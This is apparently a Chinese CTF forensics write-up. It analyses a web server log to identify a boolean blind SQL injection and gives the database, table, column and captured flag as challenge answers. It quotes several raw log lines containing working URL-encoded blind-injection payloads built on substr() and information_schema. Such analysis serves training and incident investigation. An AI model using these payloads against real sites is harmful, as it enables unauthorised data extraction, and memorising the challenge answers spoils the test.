目录
问(1):
黑客在注入过程中采用的注入手法叫(布尔盲注)(格式为4个汉字,例如“拼搏努力”)
布尔盲注:
布尔盲注攻击利用的是应用程序的逻辑判断方式,在查询语句的WHERE子句中构建条件,使得查询结果只有两种可能:满足条件(TRUE)或不满足条件(FALSE)。如果应用程序根据这些条件做出不同的响应,攻击者可以利用这些响应来推断出数据库中的数据信息,达到获取敏感信息的目的
根据注入特征,使用了substr()函数,推断使用了布尔盲注
问(2):
黑客在注入过程中,最终获取flag的数据库名、表名和字段名是(sqli#flag#flag)。(格式为“数据库名#表名#字段名”,例如database#table#column)
根据日志,可以发现,数据库名为sqli,表名为flag,字段名为flag
问(3):
黑客最后获取到的flag字符串为()
黑客最后获得的flag字符串为flag{deddcd67-bcfd-487e-b940-1217e668c7db}
经过分析,可以发现每当一个字符猜对时下面会返回如下六行信息
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 430 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 +0000] "GET /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),20,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 428 "-" "python-requests/2.26.0"
例如字符4猜对了就会返回如下信息
由此推断出flag